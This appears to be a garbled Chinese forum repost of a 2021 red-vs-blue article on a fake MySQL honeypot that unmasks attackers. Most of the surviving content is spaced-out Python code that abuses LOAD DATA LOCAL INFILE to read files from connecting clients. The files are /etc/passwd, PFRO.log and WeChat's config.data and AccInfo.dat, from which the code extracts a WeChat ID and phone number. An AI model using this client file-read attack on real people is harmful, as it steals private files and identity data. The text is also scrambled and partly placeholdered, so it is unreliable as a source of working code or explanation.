[22021] 2021-05-29_『红蓝对抗』利用蜜罐获取攻击者微信ID及手机号

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2021-05-29_『红蓝对抗』利用蜜罐获取攻击者微信ID及手机号 I D L e m o n S e c   2 0 2 1 - 0 5 - 2 9 2 0 2 1 - 0 5 - 2 9 O b s i d i a n         0 5 2 9 - 0 x 0 0                             M y S Q L d o c k e r f i l e C T F I D C S D N I D M y S Q L h t t p s : / / g i t h u b . c o m / q i g p i g / M y s q l H o n e y p o t M y S Q L g i t h u b s e r v e r
0 x 0 1   1 . 1     使     1 . 2   F a k e   M y S Q L M y S Q L F a k e   M y S Q L M y S Q L M y S Q L M y S Q L L O A D   D A T A   L O C A L   I N F I L E
3 3 0 6         p a y l o a d L i n u x / e t c / p a s s w d C : W i n d o w s P F R O . l o g I D
    0 x 0 2   2 . 1       h t t p s : / / g i t h u b . c o m / q i g p i g / M y s q l H o n e y p o t w i n d o w s d e f   m y s q l _ g e t _ f i l e _ c o n t e n t ( f i l e n a m e , c o n n , a d d r e s s ) :         l o g p a t h   =   o s . p a t h . a b s p a t h ( ' . ' )   +   " / l o g / "   +   a d d r e s s [ 0 ]         i f   n o t   o s . p a t h . e x i s t s ( l o g p a t h ) :                 o s . m a k e d i r s ( l o g p a t h )
                o s . m a k e d i r s ( l o g p a t h )         c o n n . s e n d a l l ( " x x x " )         t r y :                 c o n n . r e c v ( 1 0 2 4 0 0 0 )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( e )         t r y :                 c o n n . s e n d a l l ( " x x " )                 r e s 1   =   c o n n . r e c v ( 1 0 2 4 0 0 0 )                 #   S H O W   V A R I A B L E S                 i f   ' S H O W   V A R I A B L E S '   i n   r e s 1 :                         c o n n . s e n d a l l ( " x x x " )                         r e s 2   =   c o n n . r e c v ( 9 9 9 9 )                         i f   ' S H O W   W A R N I N G S '   i n   r e s 2 :                                 c o n n . s e n d a l l ( " x x x " )                                 r e s 3   =   c o n n . r e c v ( 9 9 9 9 )                                 i f   ' S H O W   C O L L A T I O N '   i n   r e s 3 :                                         c o n n . s e n d a l l ( " x x x " )                                         r e s 4   =   c o n n . r e c v ( 9 9 9 9 )                                         i f   ' S E T   N A M E S   u t f 8 '   i n   r e s 4 :                                                 c o n n . s e n d a l l ( " x x x " )                                                 r e s 5   =   c o n n . r e c v ( 9 9 9 9 )                                                 i f   ' S E T   c h a r a c t e r _ s e t _ r e s u l t s = N U L L '   i n   r e s 5 :                                                         c o n n . s e n d a l l ( " x x x " )                                                         c o n n . c l o s e ( )                                         e l s e :                                                 c o n n . c l o s e ( )                                 e l s e :                                         c o n n . c l o s e ( )                         e l s e :                                 c o n n . c l o s e ( )                 e l s e :                         t r y :                                 w a n t f i l e   =   c h r ( l e n ( f i l e n a m e )   +   1 )   +   " x 0 0 x 0 0 x 0 1 x F B "   +   f i l e n a m e                                 c o n n . s e n d a l l ( w a n t f i l e )                                 c o n t e n t = ' '                                 w h i l e   T r u e :                                         d a t a   =   c o n n . r e c v ( 1 0 2 4 )                                         p r i n t   l e n ( d a t a )                                         c o n t e n t   + =   d a t a                                         i f   l e n ( d a t a )   <   1 0 2 4 :                                                 p r i n t   ' o k '                                                 b r e a k                                 c o n n . c l o s e ( )                                 i t e m = l o g p a t h   +   " / "   +   f i l e n a m e . r e p l a c e ( " / " ,   " _ " ) . r e p l a c e ( " : " ,   " " ) + ' _ ' + s t r ( r a n d o m . r a n d o m ( ) )                                 i f   l e n ( c o n t e n t )   >   6 :                                         w i t h   o p e n ( i t e m ,   " w " )   a s   f :                                                 f . w r i t e ( c o n t e n t )
1 . 3 3 0 6 2 . P S                                                 f . w r i t e ( c o n t e n t )                                                 f . c l o s e ( )                                         r e t u r n   ( T r u e , c o n t e n t )                                 e l s e :                                         r e t u r n   ( F a l s e , c o n t e n t )                         e x c e p t   E x c e p t i o n   a s   e :                                 p r i n t   ( e )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t   ( e ) w h i l e w h i l e   T r u e :                 c o n n ,   a d d r e s s   =   s v . a c c e p t ( )                 f i r s t _ t i m e   =   d a t e t i m e . d a t e t i m e . n o w ( ) . s t r f t i m e ( " % Y - % m - % d   % H : % M : % S " )                 g l o b a l   f i l e s 1                 g l o b a l   u s e r n a m e                 g l o b a l   w x _ i d                 f i l e = f i l e s 1 [ 0 ] . r e p l a c e ( ' A d m i n i s t r a t o r ' , u s e r n a m e ) . r e p l a c e ( ' w x _ i d ' , w x _ i d )                 r e s , c o n t e n t   =   m y s q l _ g e t _ f i l e _ c o n t e n t ( f i l e , c o n n , a d d r e s s )                 f i l e s 1 . a p p e n d ( f i l e s 1 [ 0 ] )                 f i l e s 1 . r e m o v e ( f i l e s 1 [ 0 ] )                 i f   r e s :                         i f   ' P F R O '   i n   f i l e :                                 u s e r n a m e   =   g e t _ u s e r n a m e ( c o n t e n t )                                 s =   " x x "   %   ( x x )                                 c u r s o r . e x e c u t e ( s )                                 d a t a   =   c u r s o r . f e t c h a l l ( )                                 i f   l e n ( d a t a ) = = 0 :                                         s   =   " X X "   %   ( x x )                                         c u r s o r . e x e c u t e ( s )                                         d b . c o m m i t ( )                                         p r i n t   ' s u c c e s s : ' +   f i l e                                         i n s e r t _ f i l e ( f i l e , a d d r e s s , u s e r n a m e )                         e l i f   ' c o n f i g . d a t a ' i n   f i l e :                                 c o n t e n t   =   c o n t e n t                                 w x i d   =   r e . f i n d a l l ( r ' W e C h a t F i l e s ( . * ) c o n f i g ' ,   c o n t e n t ) [ 0 ]                                 s q l   =   " x x x "   %   ( x x x )                                 c u r s o r . e x e c u t e ( s q l )                                 d b . c o m m i t ( )                                 w x _ i d = w x i d                                 i m g   =   q r c o d e . m a k e ( ' w e i x i n : / / c o n t a c t s / p r o f i l e / ' + w x i d )                                 i m g . s a v e ( o s . p a t h . a b s p a t h ( ' . ' ) + ' / s t a t i c / p i c / ' + w x i d + ' . p n g ' )  
1 . 2 . 3 .                                     p r i n t   ' s u c c e s s : ' +   f i l e                                 i n s e r t _ f i l e ( f i l e , a d d r e s s , u s e r n a m e )                         e l i f   ' A c c I n f o '   i n   f i l e :                                 c o n t e n t   =   c o n t e n t                                 p h o n e   =   r e . f i n d a l l ( r ' [ 0 - 9 ] { 1 1 } ' ,   c o n t e n t ) [ - 1 ]                                 s q l   =   " x x x "   %   ( x x x )                                 c u r s o r . e x e c u t e ( s q l )                                 d b . c o m m i t ( )                                 p r i n t   ' s u c c e s s : ' +   f i l e                                 i n s e r t _ f i l e ( f i l e , a d d r e s s , u s e r n a m e )                 e l s e :                         f i l e s 1 = f i l e s                         u s e r n a m e = ' A d m i n i s t r a t o r ' C : / W i n d o w s / P F R O . l o g C : / U s e r s / / D o c u m e n t s / W e C h a t   F i l e s / A l l   U s e r s / c o n f i g / c o n f i g . d a t a w x _ i d C : / U s e r s / / D o c u m e n t s / W e C h a t   F i l e s / w x _ i d / c o n f i g / A c c I n f o . d a t w x _ i d
2 . 2   d o c k e r 8 0 j s o n p i d 8 0
访 5 0 0 0
2 . 3             b u g l i n u x q i g p i g I P
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则